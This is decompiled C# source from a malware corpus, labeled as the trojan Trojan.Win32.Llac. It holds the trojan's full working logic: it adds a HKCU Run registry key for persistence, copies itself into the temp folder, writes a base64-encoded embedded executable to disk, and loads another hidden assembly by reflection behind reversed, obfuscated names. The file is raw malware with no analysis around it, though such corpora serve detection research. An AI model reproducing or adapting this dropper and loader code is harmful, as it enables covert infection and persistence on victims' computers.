MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.tty-c809705e7446ebdc142e8b9bb34aa8f4f3091881969b799fd3683f150a10e3e7/FEnlSOyWMywfjYq.cs

// Decompiled with JetBrains decompiler
// Type: FEnlSOyWMywfjYq
// Assembly: test, Version=1.3.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 288A639D-2BFE-47D6-AC0D-B4513E74493A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.tty-c809705e7446ebdc142e8b9bb34aa8f4f3091881969b799fd3683f150a10e3e7.exe

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.Collections;
using System.Globalization;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;

[StandardModule]
public sealed class FEnlSOyWMywfjYq
{
  public static object pnjwPSuPFwBUXzz(byte[] wfjYqescjZpEVhp)
  {
    string tempPath = Path.GetTempPath();
    if (!MyProject.Computer.FileSystem.FileExists(tempPath + "runner52.exe"))
    {
      Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("runner44", (object) ("\"" + tempPath + "runner52.exe\""));
      File.Copy(Application.ExecutablePath, tempPath + "runner52.exe");
    }
    return (object) null;
  }

  [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  public static extern int GetShortPathName(
    [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszLongPath,
    StringBuilder lpszShortPath,
    int cchBuffer);

  public static object IJKHXknUpvcDJZA(string ohOJUsuiyaVepWw, byte[] bilnxUBdzxYeBWR)
  {
    object obj;
    try
    {
      ResourceManager resourceManager = new ResourceManager("resurzi", Assembly.GetExecutingAssembly());
      object resourceSet = (object) resourceManager.GetResourceSet(CultureInfo.CurrentCulture, true, true);
      System.Type type = Assembly.Load(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("zfc47")))).GetType(Strings.StrReverse("njeb.njeb"));
      object objectValue = RuntimeHelpers.GetObjectValue(Activator.CreateInstance(type));
      type.GetMethod(Strings.StrReverse("njeb")).Invoke(RuntimeHelpers.GetObjectValue(objectValue), new object[1]
      {
        (object) new ArrayList()
        {
          (object) bilnxUBdzxYeBWR,
          (object) ohOJUsuiyaVepWw
        }
      });
      obj = (object) null;
    }
    catch (Exception ex)
    {
      ProjectData.SetProjectError(ex);
      obj = (object) null;
      ProjectData.ClearProjectError();
    }
    return obj;
  }

  [STAThread]
  public static void Main()
  {
    StringBuilder lpszShortPath = new StringBuilder(256);
    string tempPath = Path.GetTempPath();
    FEnlSOyWMywfjYq.GetShortPathName(ref tempPath, lpszShortPath, lpszShortPath.Capacity);
    FEnlSOyWMywfjYq.omdjJjEcGSiTeXJ();
    FEnlSOyWMywfjYq.IJKHXknUpvcDJZA(lpszShortPath.ToString() + "dll78.exe", FEnlSOyWMywfjYq.XrhLsKgIuILDtFa());
    FEnlSOyWMywfjYq.pnjwPSuPFwBUXzz((byte[]) null);
  }

  public static void omdjJjEcGSiTeXJ()
  {
    string tempPath = Path.GetTempPath();
    if (MyProject.Computer.FileSystem.FileExists(tempPath + "dll78.exe"))
      return;
    ResourceManager resourceManager = new ResourceManager("resurzi", Assembly.GetExecutingAssembly());
    object resourceSet = (object) resourceManager.GetResourceSet(CultureInfo.CurrentCulture, true, true);
    byte[] data = Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("smrk1")));
    MyProject.Computer.FileSystem.WriteAllBytes(tempPath + "dll78.exe", data, false);
  }

  public static byte[] XrhLsKgIuILDtFa()
  {
    ResourceManager resourceManager = new ResourceManager("resurzi", Assembly.GetExecutingAssembly());
    object resourceSet = (object) resourceManager.GetResourceSet(CultureInfo.CurrentCulture, true, true);
    return Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("wow12")));
  }
}